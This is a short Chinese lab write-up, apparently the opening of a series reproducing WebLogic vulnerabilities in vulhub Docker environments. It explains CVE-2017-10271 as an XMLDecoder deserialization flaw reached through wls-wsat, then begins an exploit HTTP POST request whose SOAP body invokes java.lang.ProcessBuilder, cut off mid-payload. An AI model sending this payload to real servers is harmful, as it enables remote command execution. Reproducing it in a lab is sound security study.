迟到的漏洞复现系列复现内容CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 CVE-2020-14882和CVE-2020-14883ssrf以上复现均采用docker以及vulhub搭建CVE-2017-10271CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下:http://localhost:7001/wls-wsat/CoordinatorPortType 通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。exp如下POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: localhost:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 633soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> soapenv:Header>work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">java version="1.4.0" class="java.beans.XMLDecoder">void class="java.lang.ProcessBu
………………………………